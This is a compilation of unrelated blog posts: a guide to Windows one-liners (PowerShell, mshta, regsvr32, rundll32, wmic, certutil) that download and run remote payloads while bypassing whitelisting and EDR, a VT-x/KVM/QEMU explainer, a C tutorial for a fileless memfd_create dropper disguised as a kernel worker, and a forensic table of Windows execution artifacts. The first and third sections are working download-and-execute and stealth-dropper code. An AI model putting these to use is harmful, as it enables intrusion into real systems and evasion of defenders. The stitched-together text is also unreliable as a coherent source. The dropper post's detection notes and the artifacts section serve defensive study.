Windows oneliners to download remote payload and execute arbitrary code

( origin text )

In the wake of the recent buzz and trend in using DDE for executing arbitrary command lines and eventually compromising a system, I asked myself « what are the coolest command lines an attacker could use besides the famous powershell oneliner » ?

These command lines need to fulfill the following prerequisites:

  • allow for execution of arbitrary code – because spawning calc.exe is cool, but has its limits huh ?
  • allow for downloading its payload from a remote server – because your super malware/RAT/agent will probably not fit into a single command line, does it ?
  • be proxy aware – because which company doesn’t use a web proxy for outgoing traffic nowadays ?
  • make use of as standard and widely deployed Microsoft binaries as possible – because you want this command line to execute on as much systems as possible
  • be EDR friendly – oh well, Office spawning cmd.exe is already a bad sign, but what about powershell.exe or cscript.exe downloading stuff from the internet ?
  • work in memory only – because your final payload might get caught by AV when written on disk

A lot of awesome work has been done by a lot of people, especially @subTee, regarding application whitelisting bypass, which is eventually what we want: execute arbitrary code abusing Microsoft built-in binaries.

Let’s be clear that not all command lines will fulfill all of the above points. Especially the « do not write the payload on disk » one, because most of the time the downloaded file will end-up in a local cache.

When it comes to downloading a payload from a remote server, it basically boils down to 3 options:

  1. either the command itself accepts an HTTP URL as one of its arguments
  2. the command accepts a UNC path (pointing to a WebDAV server)
  3. the command can execute a small inline script with a download cradle

Depending on the version of Windows (7, 10), the local cache for objects downloaded over HTTP will be the IE local cache, in one the following location:

  • C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
  • C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir>

On the other hand, files accessed via a UNC path pointing to a WebDAV server will be saved in the WebDAV client local cache:

  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

When using a UNC path to point to the WebDAV server hosting the payload, keep in mind that it will only work if the WebClient service is started. In case it’s not started, in order to start it even from a low privileged user, simply prepend your command line with « pushd \\webdavserver & popd ».

In all of the following scenarios, I’ll mention which process is seen as performing the network traffic and where the payload is written on disk.

Powershell


Ok, this is by far the most famous one, but also probably the most monitored oneif not blocked. A well known proxy friendly command line is the following:

1
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

Process performing network call: powershell.exe
Payload written on disk: NO (at least nowhere I could find using procmon !)

Of course you could also use its encoded counterpart.

But you can also call the payload directly from a WebDAV server:

1
powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Cmd


Why make things complicated when you can have cmd.exe executing a batch file ? Especially when that batch file can not only execute a series of commands but also, more importantly, embed any file type (scripting, executable, anything that you can think of !). Have a look at my Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior work), and see that you can easily drop any binary, dll, script: https://github.com/Arno0x/PowerShellScripts
So once you’ve been creative with your payload as a batch file, go for it:

1
cmd.exe /k < \\webdavserver\folder\batchfile.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Cscript/Wscript


Also very common, but the idea here is to download the payload from a remote server in one command line:

1
cscript //E:jscript \\webdavserver\folder\payload.txt

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Mshta


Mshta really is the same family as cscript/wscript but with the added capability of executing an inline script which will download and execute a scriptlet as a payload:

1
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

Process performing network call: mshta.exe
Payload written on disk: IE local cache

You could also do a much simpler trick since mshta accepts a URL as an argument to execute an HTA file:

1
mshta http://webserver/payload.hta

Process performing network call: mshta.exe
Payload written on disk: IE local cache

Eventually, the following also works, with the advantage of hiding mshta.exe downloading stuff:

1
mshta \\webdavserver\folder\payload.hta

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Rundll32


A well known one as well, can be used in different ways. First one is referring to a standard DLL using a UNC path:

1
rundll32 \\webdavserver\folder\payload.dll,entrypoint

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Rundll32 can also be used to call some inline jscript:

1
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Process performing network call: rundll32.exe
Payload written on disk: IE local cache

Wmic


Discovered by @subTee with @mattifestation, wmic can invoke an XSL (eXtensible Stylesheet Language) local or remote file, which may contain some scripting of our choice:

1
wmic os get /format:"https://webserver/payload.xsl"

Process performing network call: wmic.exe
Payload written on disk: IE local cache

Regasm/Regsvc


Regasm and Regsvc are one of those fancy application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (can be written in .Net/C#) that will expose the proper interfaces, and you can then call it over WebDAV:

1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Regsvr32


Another one from @subTee. This ones requires a slightly different scriptlet from the mshta one above. First option:

1
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

Process performing network call: regsvr32.exe
Payload written on disk: IE local cache

Second option using UNC/WebDAV:

1
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Odbcconf


This one is close to the regsvr32 one. Also discovered by @subTee, it can execute a DLL exposing a specific function. To be noted is that the DLL file doesn’t need to have the .dll extension. It can be downloaded using UNC/WebDAV:

1
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Msbuild


Let’s keep going with all these .Net framework utilities discovered by @subTee. You can NOT use msbuild.exe using an inline tasks straight from a UNC path (actually, you can but it gets really messy), so I turned out with the following trick, using msbuild.exe only. Note that it will require to be called within a shell with ENABLEDELAYEDEXPANSION (/V option):

1
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Process performing network call: svchost.exe
Payload written on disk: WebDAV client local cache

Not sure this one is really useful as is. As we’ll see later, we could use other means of downloading the file locally, and then execute it with msbuild.exe.

Combining some commands


After all, having the possibility to execute a command line (from DDE for instance) doesn’t mean you should restrict yourself to only one command. Commands can be chained to reach an objective.

For instance, the whole payload download part can be done with certutil.exe, again thanks to @subTee for discovering this:

1
certutil -urlcache -split -f http://webserver/payload payload

Now combining some commands in one line, with the InstallUtil.exe executing a specific DLL as a payload:

1
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

You could simply deliver an executable:

1
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

There are probably much other ways of achieving the same result, but these command lines do the job while fulfilling most of prerequisites we set at the beginning of this post !

One may wonder why I do not mention the usage of the bitsadmin utility as a means of downloading a payload. I’ve left this one aside on purpose simply because it’s not proxy aware.

Payloads source examples


All the command lines previously cited make use of specific payloads:

  • Various scriplets (.sct), for mshta, rundll32 or regsvr32
  • XSL files for wmic
  • HTML Application (.hta)
  • MSBuild inline tasks (.xml or .csproj)
  • DLL for InstallUtil or Regasm/Regsvc

You can get examples of most payloads from the awesome atomic-red-team repo on Github: https://github.com/redcanaryco/atomic-red-team from @redcanaryco.

You can also get all these payloads automatically generated thanks to the GreatSCT project on Github: https://github.com/GreatSCT/GreatSCT

You can also find some other examples on my gist: https://gist.github.com/Arno0x

Реклама

Intel Virtualisation: How VT-x, KVM and QEMU Work Together

VT-x is name of CPU virtualisation technology by Intel. KVM is component of Linux kernel which makes use of VT-x. And QEMU is a user-space application which allows users to create virtual machines. QEMU makes use of KVM to achieve efficient virtualisation. In this article we will talk about how these three technologies work together. Don’t expect an in-depth exposition about all aspects here, although in future, I might follow this up with more focused posts about some specific parts.

Something About Virtualisation First

Let’s first touch upon some theory before going into main discussion. Related to virtualisation is concept of emulation – in simple words, faking the hardware. When you use QEMU or VMWare to create a virtual machine that has ARM processor, but your host machine has an x86 processor, then QEMU or VMWare would emulate or fake ARM processor. When we talk about virtualisation we mean hardware assisted virtualisation where the VM’s processor matches host computer’s processor. Often conflated with virtualisation is an even more distinct concept of containerisation. Containerisation is mostly a software concept and it builds on top of operating system abstractions like process identifiers, file system and memory consumption limits. In this post we won’t discuss containers any more.

A typical VM set up looks like below:

vm-arch

 

At the lowest level is hardware which supports virtualisation. Above it, hypervisor or virtual machine monitor (VMM). In case of KVM, this is actually Linux kernel which has KVM modules loaded into it. In other words, KVM is a set of kernel modules that when loaded into Linux kernel turn the kernel into hypervisor. Above the hypervisor, and in user space, sit virtualisation applications that end users directly interact with – QEMU, VMWare etc. These applications then create virtual machines which run their own operating systems, with cooperation from hypervisor.

Finally, there is “full” vs. “para” virtualisation dichotomy. Full virtualisation is when OS that is running inside a VM is exactly the same as would be running on real hardware. Paravirtualisation is when OS inside VM is aware that it is being virtualised and thus runs in a slightly modified way than it would on real hardware.

VT-x

VT-x is CPU virtualisation for Intel 64 and IA-32 architecture. For Intel’s Itanium, there is VT-I. For I/O virtualisation there is VT-d. AMD also has its virtualisation technology called AMD-V. We will only concern ourselves with VT-x.

Under VT-x a CPU operates in one of two modes: root and non-root. These modes are orthogonal to real, protected, long etc, and also orthogonal to privilege rings (0-3). They form a new “plane” so to speak. Hypervisor runs in root mode and VMs run in non-root mode. When in non-root mode, CPU-bound code mostly executes in the same way as it would if running in root mode, which means that VM’s CPU-bound operations run mostly at native speed. However, it doesn’t have full freedom.

Privileged instructions form a subset of all available instructions on a CPU. These are instructions that can only be executed if the CPU is in higher privileged state, e.g. current privilege level (CPL) 0 (where CPL 3 is least privileged). A subset of these privileged instructions are what we can call “global state-changing” instructions – those which affect the overall state of CPU. Examples are those instructions which modify clock or interrupt registers, or write to control registers in a way that will change the operation of root mode. This smaller subset of sensitive instructions are what the non-root mode can’t execute.

VMX and VMCS

Virtual Machine Extensions (VMX) are instructions that were added to facilitate VT-x. Let’s look at some of them to gain a better understanding of how VT-x works.

VMXON: Before this instruction is executed, there is no concept of root vs non-root modes. The CPU operates as if there was no virtualisation. VMXON must be executed in order to enter virtualisation. Immediately after VMXON, the CPU is in root mode.

VMXOFF: Converse of VMXON, VMXOFF exits virtualisation.

VMLAUNCH: Creates an instance of a VM and enters non-root mode. We will explain what we mean by “instance of VM” in a short while, when covering VMCS. For now think of it as a particular VM created inside QEMU or VMWare.

VMRESUME: Enters non-root mode for an existing VM instance.

When a VM attempts to execute an instruction that is prohibited in non-root mode, CPU immediately switches to root mode in a trap-like way. This is called a VM exit.

Let’s synthesise the above information. CPU starts in a normal mode, executes VMXON to start virtualisation in root mode, executes VMLAUNCH to create and enter non-root mode for a VM instance, VM instance runs its own code as if running natively until it attempts something that is prohibited, that causes a VM exit and a switch to root mode. Recall that the software running in root mode is hypervisor. Hypervisor takes action to deal with the reason for VM exit and then executes VMRESUME to re-enter non-root mode for that VM instance, which lets the VM instance resume its operation. This interaction between root and non-root mode is the essence of hardware virtualisation support.

Of course the above description leaves some gaps. For example, how does hypervisor know why VM exit happened? And what makes one VM instance different from another? This is where VMCS comes in. VMCS stands for Virtual Machine Control Structure. It is basically a 4KiB part of physical memory which contains information needed for the above process to work. This information includes reasons for VM exit as well as information unique to each VM instance so that when CPU is in non-root mode, it is the VMCS which determines which instance of VM it is running.

As you may know, in QEMU or VMWare, we can decide how many CPUs a particular VM will have. Each such CPU is called a virtual CPU or vCPU. For each vCPU there is one VMCS. This means that VMCS stores information on CPU-level granularity and not VM level. To read and write a particular VMCS, VMREAD and VMWRITE instructions are used. They effectively require root mode so only hypervisor can modify VMCS. Non-root VM can perform VMWRITE but not to the actual VMCS, but a “shadow” VMCS – something that doesn’t concern us immediately.

There are also instructions that operate on whole VMCS instances rather than individual VMCSs. These are used when switching between vCPUs, where a vCPU could belong to any VM instance. VMPTRLD is used to load the address of a VMCS and VMPTRST is used to store this address to a specified memory address. There can be many VMCS instances but only one is marked as current and active at any point. VMPTRLD marks a particular VMCS as active. Then, when VMRESUME is executed, the non-root mode VM uses that active VMCS instance to know which particular VM and vCPU it is executing as.

Here it’s worth noting that all the VMX instructions above require CPL level 0, so they can only be executed from inside the Linux kernel (or other OS kernel).

VMCS basically stores two types of information:

  1. Context info which contains things like CPU register values to save and restore during transitions between root and non-root.
  2. Control info which determines behaviour of the VM inside non-root mode.

More specifically, VMCS is divided into six parts.

  1. Guest-state stores vCPU state on VM exit. On VMRESUME, vCPU state is restored from here.
  2. Host-state stores host CPU state on VMLAUNCH and VMRESUME. On VM exit, host CPU state is restored from here.
  3. VM execution control fields determine the behaviour of VM in non-root mode. For example hypervisor can set a bit in a VM execution control field such that whenever VM attempts to execute RDTSC instruction to read timestamp counter, the VM exits back to hypervisor.
  4. VM exit control fields determine the behaviour of VM exits. For example, when a bit in VM exit control part is set then debug register DR7 is saved whenever there is a VM exit.
  5. VM entry control fields determine the behaviour of VM entries. This is counterpart of VM exit control fields. A symmetric example is that setting a bit inside this field will cause the VM to always load DR7 debug register on VM entry.
  6. VM exit information fields tell hypervisor why the exit happened and provide additional information.

There are other aspects of hardware virtualisation support that we will conveniently gloss over in this post. Virtual to physical address conversion inside VM is done using a VT-x feature called Extended Page Tables (EPT). Translation Lookaside Buffer (TLB) is used to cache virtual to physical mappings in order to save page table lookups. TLB semantics also change to accommodate virtual machines. Advanced Programmable Interrupt Controller (APIC) on a real machine is responsible for managing interrupts. In VM this too is virtualised and there are virtual interrupts which can be controlled by one of the control fields in VMCS. I/O is a major part of any machine’s operations. Virtualising I/O is not covered by VT-x and is usually emulated in user space or accelerated by VT-d.

KVM

Kernel-based Virtual Machine (KVM) is a set of Linux kernel modules that when loaded, turn Linux kernel into hypervisor. Linux continues its normal operations as OS but also provides hypervisor facilities to user space. KVM modules can be grouped into two types: core module and machine specific modules. kvm.ko is the core module which is always needed. Depending on the host machine CPU, a machine specific module, like kvm-intel.ko or kvm-amd.ko will be needed. As you can guess, kvm-intel.ko uses the functionality we described above in VT-x section. It is KVM which executes VMLAUNCH/VMRESUME, sets up VMCS, deals with VM exits etc. Let’s also mention that AMD’s virtualisation technology AMD-V also has its own instructions and they are called Secure Virtual Machine (SVM). Under `arch/x86/kvm/` you will find files named `svm.c` and `vmx.c`. These contain code which deals with virtualisation facilities of AMD and Intel respectively.

KVM interacts with user space – in our case QEMU – in two ways: through device file `/dev/kvm` and through memory mapped pages. Memory mapped pages are used for bulk transfer of data between QEMU and KVM. More specifically, there are two memory mapped pages per vCPU and they are used for high volume data transfer between QEMU and the VM in kernel.

`/dev/kvm` is the main API exposed by KVM. It supports a set of `ioctl`s which allow QEMU to manage VMs and interact with them. The lowest unit of virtualisation in KVM is a vCPU. Everything builds on top of it. The `/dev/kvm` API is a three-level hierarchy.

  1. System Level: Calls this API manipulate the global state of the whole KVM subsystem. This, among other things, is used to create VMs.
  2. VM Level: Calls to this API deal with a specific VM. vCPUs are created through calls to this API.
  3. vCPU Level: This is lowest granularity API and deals with a specific vCPU. Since QEMU dedicates one thread to each vCPU (see QEMU section below), calls to this API are done in the same thread that was used to create the vCPU.

After creating vCPU QEMU continues interacting with it using the ioctls and memory mapped pages.

QEMU

Quick Emulator (QEMU) is the only user space component we are considering in our VT-x/KVM/QEMU stack. With QEMU one can run a virtual machine with ARM or MIPS core but run on an Intel host. How is this possible? Basically QEMU has two modes: emulator and virtualiser. As an emulator, it can fake the hardware. So it can make itself look like a MIPS machine to the software running inside its VM. It does that through binary translation. QEMU comes with Tiny Code Generator (TCG). This can be thought if as a sort of high-level language VM, like JVM. It takes for instance, MIPS code, converts it to an intermediate bytecode which then gets executed on the host hardware.

The other mode of QEMU – as a virtualiser – is what achieves the type of virtualisation that we are discussing here. As virtualiser it gets help from KVM. It talks to KVM using ioctl’s as described above.

QEMU creates one process for every VM. For each vCPU, QEMU creates a thread. These are regular threads and they get scheduled by the OS like any other thread. As these threads get run time, QEMU creates impression of multiple CPUs for the software running inside its VM. Given QEMU’s roots in emulation, it can emulate I/O which is something that KVM may not fully support – take example of a VM with particular serial port on a host that doesn’t have it. Now, when software inside VM performs I/O, the VM exits to KVM. KVM looks at the reason and passes control to QEMU along with pointer to info about the I/O request. QEMU emulates the I/O device for that requests – thus fulfilling it for software inside VM – and passes control back to KVM. KVM executes a VMRESUME to let that VM proceed.

In the end, let us summarise the overall picture in a diagram:

overall-diag

Super-Stealthy Droppers

( origin article )

Some weeks ago I found [this interesting article] (https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html 383), about injecting code in running processes without using ptrace. The article is very interesting and I recommend you to read it, but what caught my attention was a brief sentence towards the end. Actually this one:

The current payload in use is a simple open/memfd_create/sendfile/fexecve program

I’ve never heard before about memfd_create or fexecve… that’s why this sentence caught my attention.

In this paper we are going to talk about how to use these functions to develop a super-stealthy dropper. You could consider it as a malware development tutorial… but you know that it is illegal to develop and also to deploy malware. This means that, this paper is only for educational purposes… because, after all, a malware analyst needs to know how malware developers do their stuff in order to identify it, neutralise it and do what is needed to keep systems safe.

memfd_create and fexecve

So, after reading that intriguing sentence, I googled those two functions and I saw they were pretty cool. The first one is actually pretty awesome, it allows us to create a file in memory. We have quickly talked about this in [a previous paper] (Running binaries without leaving tracks), but for that we were just using /dev/shm to store our file. That folder is actually stored in memory so, whatever we write there does not end up in the hard-drive (unless we run out of memory and we start swapping). However, the file was visible with a simple ls.

memfd_create does the same, but the memory disk it uses is not mapped into the file system and therefore you cannot find the file with a simple ls. 😮

The second one, fexecve is also pretty awesome. It allows us to execute a program (exactly the same way that execve), but we reference the program to run using a file descriptor, instead of the full path. And this one matches perfectly with memfd_create.

But there is a caveat with this function calls. They are relatively new. memfd_create was introduced in kernel 3.17 and fexecve is a libc function available since version 2.3.2. While, fexecve can be easily implemented when not available (we will see that in a sec), memfd_create is just not there on old kernels…

What does this means?. It means that, at least nowadays, the technique we are going to describe will not work on embedded devices that usually run old kernels and have stripped-down versions of libc. Although, I haven’t checked the availability of fexecve in for instance some routers or Android phones, I believe it is very likely that they are not available. If anybody knows, please drop a line in the comments.

A simple dropper

In order to figure out how these two little guys work, I wrote a simple dropper. Well, it is actually a program able to download some binary from a remote server and run it directly into memory, without dropping it in the disk.

Before continuing, let’s check the Hajime case we described [towards the end of this post] (IoT Malware Droppers (Mirai and Hajime)). There you will find a cryptic shell line that basically creates a file with execution permissions to drop into it another file which is downloaded from the net. Then the downloaded program gets executed and deleted from the disk. In case you don’t want to open the link again, this is the line I’m talking about:

cp .s .i; >.i; ./.s>.i; ./.i; rm .s; /bin/busybox ECCHI

We are going to write a version of .s that, once executed, will do exactly the same that the cryptic shell line above.

Let’s first take a look to the code and then we can comment it.

The code

This is the code:

#include <stdio.h>
#include <stdlib.h>

#include <sys/syscall.h>

#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

#define __NR_memfd_create 319
#define MFD_CLOEXEC 1

static inline int memfd_create(const char *name, unsigned int flags) {
    return syscall(__NR_memfd_create, name, flags);
}

extern char        **environ;

int main (int argc, char **argv) {
  int                fd, s;
  unsigned long      addr = 0x0100007f11110002;
  char               *args[2]= {"[kworker/u!0]", NULL};
  char               buf[1024];

  // Connect
  if ((s = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) exit (1);
  if (connect (s, (struct sockaddr*)&addr, 16) < 0) exit (1);
  if ((fd = memfd_create("a", MFD_CLOEXEC)) < 0) exit (1);

  while (1) {
      if ((read (s, buf, 1024) ) <= 0) break;
      write (fd, buf, 1024);
    }
  close (s);
  
  if (fexecve (fd, args, environ) < 0) exit (1);

  return 0;
    
}

It is pretty short and simple, isn’t it?. But there are a couple of things we have to say about it.

Calling memfd_create

The first thing we have to comment is that, there is no libc wrapper to the memfd_create system call. You would find this information in the memfd_create manpage’s NOTES section 42. That means that we have to write our own wrapper.

First, we need to figure out the syscall index for memfd_create. Just use any on-line syscall list. Remember that the indexes changes with the architecture, so if you plan to use the code on an ARM or a MIPS, you may need to use a different index. The index we used 319 is for x86_64.

You can see the wrapper at the very beginning of the code (just after the #include directives), using the syscall libc function.

Then, the program just does the following:

  • Create a normal TCP socket
  • Connect to port 0x1111 on 127.0.0.1 using family AF_INET… We have packed all this information in a long variable to make the code shorter… but you can easily modify this information taking into account that:
    addr = 01 00 00  7f   1111  0002;
            1. 0. 0.127   1111  0002;
           +------------+------+----
             IP Address | Port | Family

Of course this is not standard and whenever the struct sockaddr_in change, the code will break down… but it was cool to write it like this :stuck_out_tongue:

  • Creates a memory file
  • Reads data from the socket and writes it into the memory file
  • Runs the memory file once all the data has been transferred.

That’s it… very simple and straightforward.

Testing

So, now it is time to test it. According to our long constant in the main function, the dropper will connect to port 0x1111 on localhost (127.0.0.1). So we will improvise a file server with netcat.

In one console we just run this command:

$ cat /usr/bin/xeyes | nc -l $((0x1111))

You can chose whatever binary you prefer. I like those little eyes following my mouse pointer all over the place

Then in another console we run the dropper, and those funny xeyes should pop-up in your screen. Let’s see which tracks we can find after running the remote code.

Detecting the dropper

Spotting the process is difficult because we have given it a funny name (kworker/u!0). Note the ! character that is just there to allow me to quickly identify the process for debugging purposes. In reality, you would like to use a : so the process looks like one of those kernel workers. But, let’s look at the ps output.

$ ps axe
(...)
 2126 ?        S      0:00 [kworker/0:0]
 2214 pts/0    S+     0:00 [kworker/u!0]
(...)

You can see the output for a legit kworker process in the first line, and then you find our doggy program in the second line… which is associated to a pseudo-terminal!!!.. I think this can be easily avoided… but I will leave this to you to sharp your UNIX development skills :wink:

However, even if you detach the process from the pseudo-terminal…

Invisible file

We mentioned that memfd_create will create a file in a RAM filesystem that is not mapped into the normal filesystem tree… at least, if it is mapped, I couldn’t find where. So far this looks like a pretty stealth way to drop a file!!

However, let’s face it, if there is a file somewhere, there should be a way to find it… shouldn’t it? Of course it is. But, when you are in this kind of troubles… who you gonna call?.. Sure… Ghostbusters!. And you know what?, for GNU/Linux systems the way to bust ghosts is using lsof :).

$ lsof | grep memfd
3         2214            pico  txt       REG                0,5    19928      28860 /memfd:a (deleted)

So, we can easily find any memfd file in the system using lsof. Note that lsof will also indicate the associated PID so we can also easily pin point the dropped process even when it is using some name camouflage and it is not associated to a pseudo-terminal!!!

What if memfd_open is not available?

We have mentioned that memfd_open is only available on kernels 3.17 or higher. What can be done for other kernels?. In this case we will be a bit less stealthy but we can still do pretty well.

Our best option in this case is to use shm_open (SHared Memory Open). This function basically creates a file under /dev/shm… however, this one will be visible with ls, but at least we avoid writing to the disk. The only difference between using shm_open or just open is that shm_open will create the files directly under /dev/shm. While, when using open we have to provide the whole path.

To modify the dropper to use shm_open we have to do two things.

First we have to substitute the memfd_create call by a shm_open call like this:

(...)
if ((fd = shm_open("a", O_RDWR | O_CREAT, S_IRWXU)) < 0) exit (1);
(...)

The second thing is that we need to close the file and re-open it read-only in order to be able to execute it with fexecve. So, after the while loop that populates the file we have to close and re-open the file:

(...)
  close (fd);

  if ((fd = shm_open("a", O_RDONLY, 0)) < 0) exit (1);
(...)

However note that, now it does not make much sense to use fexecve and we can avoid reopening the file read-only and just call execve on the file created at /dev/shm/ which is effectively the same and it is also shorter.

… and what if fexecve is not available?

This one is pretty easy, whenever you get to know how fexecve works. How can you figure out how the function works?.. just google for its source code!!!. A hint is provided in the man page tho:

NOTES
On Linux, fexecve() is implemented using the proc(5) file system, so /proc needs to be mounted and available at the time of the call.

So, what it does is to just use execve but providing as file path the file descriptor entry under /proc. Let’s elaborate this a bit more. You know that each open file is identified by an integer and you also know that each process in your GNU/Linux system exports all its related information under the proc pseudo file system in a folder named against its PID (supposing the proc file system is mounted). Well, inside that folder you will find another folder named fd containing a file per each file descriptor opened by the process. Each file is named against its actual file descriptor, that is, the integer number.

Knowing all this, we can run a file identified by a file descriptor just passing the path to the right file under /proc/PID/fd/THE_FD to execve. A basic implementation of fexecve will look like this:

int
my_fexecve (int fd, char **arg, char **env) {
  char  fname[1024];

  snprintf (fname, 1024, "/proc/%d/fd/%d", getpid(), fd);
  execve (fname, arg, env);
  return 0;
}

This implementation of fexecve is completely equivalent to the standard one… well it is missing some sanity checks but, after all, we’re living in the edge :P.

As mentioned before, this is very convenient to be used together with memfd_open that returns to us a file descriptor and does not require the close/open sequence. Otherwise, when there is a file somewhere, even in memory, it is even faster to just use execve as you can infer from the implementation above.

Conclusions

Well, this is it. Hope you have found this interesting. It was interesting for me. Now, after having read this paper, you should be able to figure out what the open/memfd_create/sendfile/fexecve we mentioned at the beginning means…

We have also seen a quite stealthy technique to drop files in a remote system. And we have also learn how to detect the dropper even when it may look invisible at first glance.

You can download all the code from: 0x00pf/0x00sec_code

Available Artifacts — Evidence of Execution

The main focus of this post, and particularly the associated table of artifacts, is to serve as a reference and reminder of what evidence sources may be available on a particular system during analysis.

On to the main event. The table below details some of the artifacts which evidence program execution and whether they are available for different versions of the Windows Operating System.

Too Small?… It’s a hyperlink!

Cells in Green are where the artifact is available by default, note some artifacts may not be available despite a Green cell (e.g. instances where prefetch is disabled due to an SSD)

Cells in yellow indicate that the artifact is associated with a feature that is disabled by default but that may be enabled by an administrator (e.g. Prefetch on a Windows Server OS) or added through the application of a patch or update (e.g. The introduction of BAM to Windows 10 in 1709+ or back-porting of Amcache to Windows 7 in the optional update KB2952664+)

Cells in Red indicate that the artifact is not available in that version of the OS.

Cells in Grey (containing «TBC») indicate that I’m not 100% sure at the time of writing whether the artifact is present in a particular OS version, that I have more work to do, and that it would be great if you could let me know if you already know the answer!

It is my hope that this table will be helpful to others. It will be updated and certainly at this stage it may be subject to errors as I am reliant upon research and memory of artifacts without having the opportunity to double check each entry through testing. Feedback, both in the form of suggested additions and any required corrections is very much appreciated and encouraged.

Summary of Artifacts

What follows below is brief details on the availability of these artifacts, some useful resources for additional information and tools for parsing them. It is not my intention to go into detail as to the functioning of the artifacts as this is generally already well covered within the references.

Prefetch

Prefetch has historically been the go to indication of process execution. If enabled, it can provide a wealth of useful data in an investigation or incident response. However, since Windows 7, systems with an SSD installed as the OS volume have had prefetch disabled by default during installation. With that said, I have seen plenty of systems with SSDs which have still had prefetch enabled (particularaly in businesses which push a standard image) so it is always worth checking for. Windows Server installations also have Prefetch disabled by default, but the same applies.

The following registry key can be used to determine if it is enabled:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher
0 = Disabled
1 = Only Application launch prefetching enabled
2 = Only Boot prefetching enabled
3 = Both Application launch and Boot prefetching enabled

References/Tools:
https://www.forensicmag.com/article/2010/12/decoding-prefetch-files-forensic-purposes-part-1
https://github.com/EricZimmerman/Prefetch

ShimCache

It should be noted that the presence of an entry for an executable within the ShimCache doesn’t always mean it was executed as merely navigating to it can cause it to be listed. Additionally Windows XP ShimCache is limited to 96 entries all versions since then retain up to 1024 entries.

ShimCache has one further notable drawback. The information is retained in memory and is only written to the registry when the system is shutdown. Data can be retrieved from a memory image if available.

References/Tools:
https://www.fireeye.com/blog/threat-research/2015/06/caching_out_the_val.html
https://www.andreafortuna.org/cybersecurity/amcache-and-shimcache-in-forensic-analysis/
https://github.com/EricZimmerman/AppCompatCacheParser

MUICache

Programs executed via Explorer result in MUICache entries being created within the NTUSER.DAT of the user responsible.

References/Tools:
http://windowsir.blogspot.com/2005/12/mystery-of-muicachesolved.html
http://what-when-how.com/windows-forensic-analysis/registry-analysis-windows-forensic-analysis-part-8/

Amcache / RecentFileCache.bcf

Amcache.hve within Windows 8+ and RecentFileCache.bcf within Windows 7 are two distinct artifacts which are used by the same mechanism in Windows to track application compatibility issues with different executables. As such it can be used to determine when executables were first run.

References/Tools:
https://www.andreafortuna.org/cybersecurity/amcache-and-shimcache-in-forensic-analysis/
http://www.swiftforensics.com/2013/12/amcachehve-in-windows-8-goldmine-for.html
http://digitalforensicsurvivalpodcast.com/2016/07/05/dfsp-020-amcache-forensics-find-evidence-of-app-execution/
https://www.dfir.training/windows/amcache/207-lifars-amcache-and-shimcache-forensics/file

Microsoft-Windows-TaskScheduler (200/201)

The Microsoft-Windows-TaskScheduler log file (specifically events 200 and 201), can evidence the starting and stopping of and executable which is being run as a scheduled task.

References/Tools:
https://www.fireeye.com/blog/threat-research/2013/08/execute.html

LEGACY_* Registry Keys

Applicable to Windows XP/Server 2003 only, this artifact is located in the System Registry Hive, these keys can evidence the running of executables which are installed as a service.

References/Tools:
http://windowsir.blogspot.com/2013/07/howto-determine-program-execution.html
http://journeyintoir.blogspot.com/2014/01/it-is-all-about-program-execution.html

Microsoft-Windows-Application-Experience Program-Inventory / Telemetry

Both of these system logs are related to the Application Experience and Compatibility features implemented in modern versions of Windows.

At the time of testing I find none of my desktop systems have the Inventory log populated, while the Telemetry log seems to contain useful information. I have however seen various discussion online indicating that the Inventory log is populated in Windows 10. It is likely that my disabling of all tracking and reporting functions on my personal systems and VMs may be the cause… more testing required.

References/Tools:
http://journeyintoir.blogspot.com/2014/03/exploring-program-inventory-event-log.html

Background Activity Monitor (BAM)

The Background Activity Monitor (BAM) and (DAM) registry keys within the SYSTEM registry hive, however as it records them under the SID of the associated user it is user attributable. The key details  the path of executable files that have been executed and last execution date/time

It was introduced to Windows 10 in 1709 (Fall Creators update).

References/Tools:
https://www.andreafortuna.org/dfir/forensic-artifacts-evidences-of-program-execution-on-windows-systems/
https://www.linkedin.com/pulse/alternative-prefetch-bam-costas-katsavounidis/

System Resource Usage Monitor (SRUM)

Introduced in Windows 8, this Windows features maintains a record of all sorts of interesting information concerning applications and can be used to determine when applications were running.

References/Tools:
https://www.sans.org/summit-archives/file/summit-archive-1492184583.pdf
http://cyberforensicator.com/2017/08/06/windows-srum-forensics/
